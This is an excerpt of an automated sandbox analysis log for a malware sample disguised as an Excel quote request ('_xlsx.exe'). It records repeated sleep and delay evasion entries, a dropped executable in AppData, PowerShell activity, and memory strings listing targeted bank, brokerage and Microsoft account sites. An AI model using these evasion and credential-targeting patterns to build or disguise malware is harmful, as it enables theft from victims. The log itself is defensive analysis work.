Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594512s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -594062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -593844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 7508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8056	Thread sleep count: 2192 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599860s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8056	Thread sleep count: 7652 > 30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599406s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598691s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -598016s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596229s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595641s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594389s >= -30000s
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe TID: 8052	Thread sleep time: -594281s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599543	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597448	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594512	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594062	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599860
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598691
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596229
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594389
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594281

Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
